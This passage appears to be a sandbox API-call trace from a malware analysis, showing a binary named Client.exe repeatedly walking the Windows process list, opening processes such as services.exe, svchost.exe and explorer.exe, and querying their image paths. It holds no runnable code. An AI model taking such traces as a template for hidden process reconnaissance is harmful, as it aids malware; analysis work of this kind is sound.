th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.352] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.352] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.353] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.354] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0290.355] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.356] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.356] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.357] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.358] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.358] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x178 [0290.358] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x9110b0, nSize=0x104 | out: lpFilename="\x01" (normalized: "c:\\windows\\syswow64\\\x01")) returned 0x0 [0290.359] CloseHandle (hObject=0x178) returned 1 [0290.359] CloseHandle (hObject=0x170) returned 1 [0290.359] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0290.359] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18faf0) returned 1 [0290.360] CloseHandle (hObject=0x170) returned 1 [0290.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x9e09e8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\services.exe", lpUsedDefaultChar=0x0) returned 32 [0290.360] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x360) returned 0x170 [0290.360] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.362] CloseHandle (hObject=0x170) returned 1 [0290.362] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.363] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x9e09e8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\svchost.exee", lpUsedDefaultChar=0x0) returned 31 [0290.363] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x360) returned 0x170 [0290.363] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd40) returned 1 [0290.365] CloseHandle (hObject=0x170) returned 1 [0290.365] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x360) returned 0x170 [0290.365] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.367] CloseHandle (hObject=0x170) returned 1 [0290.367] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x360) returned 0x170 [0290.367] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.421] CloseHandle (hObject=0x170) returned 1 [0290.421] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0290.421] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x170 [0290.421] GetPriorityClass (hProcess=0x170) returned 0x20 [0290.421] CloseHandle (hObject=0x170) returned 1 [0290.422] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3f8) returned 0x170 [0290.422] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd44) returned 1 [0290.424] CloseHandle (hObject=0x170) returned 1 [0290.424] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0290.427] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.428] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.429] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.429] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.430] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.431] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.431] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.433] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.434] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.434] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0290.435] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.436] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.436] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.437] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.438] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.438] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.439] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x178 [0290.439] GetModuleFileNameExW (in: hProcess=0x178, hModule=0x0, lpFilename=0x9110b0, nSize=0x104 | out: lpFilename="\x01" (normalized: "c:\\windows\\syswow64\\\x01")) returned 0x0 [0290.439] CloseHandle (hObject=0x178) returned 1 [0290.439] CloseHandle (hObject=0x170) returned 1 [0290.439] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x1c8) returned 0x170 [0290.440] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18f8e6, lpdwSize=0x18faf0 | out: lpExeName="C:\\Windows\\System32\\services.exe", lpdwSize=0x18faf0) returned 1 [0290.441] CloseHandle (hObject=0x170) returned 1 [0290.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0290.441] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\services.exe", cchWideChar=32, lpMultiByteStr=0x9e0a18, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\services.exe", lpUsedDefaultChar=0x0) returned 32 [0290.441] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3f8) returned 0x170 [0290.441] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.443] CloseHandle (hObject=0x170) returned 1 [0290.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0290.443] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\svchost.exe", cchWideChar=31, lpMultiByteStr=0x9e0a18, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\svchost.exee", lpUsedDefaultChar=0x0) returned 31 [0290.443] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3f8) returned 0x170 [0290.444] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd40) returned 1 [0290.446] CloseHandle (hObject=0x170) returned 1 [0290.446] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3f8) returned 0x170 [0290.446] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.449] CloseHandle (hObject=0x170) returned 1 [0290.449] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x3f8) returned 0x170 [0290.449] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\System32\\svchost.exe", lpdwSize=0x18fd48) returned 1 [0290.451] CloseHandle (hObject=0x170) returned 1 [0290.451] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0290.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x390) returned 0x170 [0290.451] GetPriorityClass (hProcess=0x170) returned 0x20 [0290.451] CloseHandle (hObject=0x170) returned 1 [0290.452] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x390) returned 0x170 [0290.452] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3a, lpdwSize=0x18fd44 | out: lpExeName="C:\\Windows\\explorer.exe", lpdwSize=0x18fd44) returned 1 [0290.454] CloseHandle (hObject=0x170) returned 1 [0290.454] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0290.458] Process32FirstW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.459] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.460] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.461] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.462] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.508] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.509] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.510] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.511] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.512] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0290.513] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.514] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.515] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.516] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.517] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.518] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.519] Process32NextW (in: hSnapshot=0x170, lppe=0x18fb14 | out: lppe=0x18fb14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x35c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0290.520] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0290.520] CloseHandle (hObject=0x170) returned 1 [0290.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0290.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0290.520] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 0 [0290.520] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x390) returned 0x170 [0290.520] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\explorer.exe", lpdwSize=0x18fd48) returned 1 [0290.523] CloseHandle (hObject=0x170) returned 1 [0290.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0290.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0290.524] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\explorer.exe", cchWideChar=23, lpMultiByteStr=0x9d92a8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\explorer.exe.exee", lpUsedDefaultChar=0x0) returned 23 [0290.524] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x390) returned 0x170 [0290.524] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb36, lpdwSize=0x18fd40 | out: lpExeName="C:\\Windows\\explorer.exe", lpdwSize=0x18fd40) returned 1 [0290.528] CloseHandle (hObject=0x170) returned 1 [0290.528] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x390) returned 0x170 [0290.528] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\explorer.exe", lpdwSize=0x18fd48) returned 1 [0290.531] CloseHandle (hObject=0x170) returned 1 [0290.531] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x390) returned 0x170 [0290.531] QueryFullProcessImageNameW (in: hProcess=0x170, dwFlags=0x0, lpExeName=0x18fb3e, lpdwSize=0x18fd48 | out: lpExeName="C:\\Windows\\explorer.exe", lpdwSize=0x18fd48) returned 1 [0290.534] CloseHandle (hObject=0x170) returned 1 [0290.534] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fb2c, nSize=0x105 | out: lpFilename="C:\\Windows\\Client.exe" (normalized: "c:\\windows\\client.exe")) returned 0x15 [0290.534] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x41c) returned 0x170 [0290.534] GetPriorityClass (hProcess=0x170) returned 0x20 [0290.535] CloseHandle (hObject=0x170) returned 1 [0290.535] OpenProcess (dwDesiredAccess=0x1000, 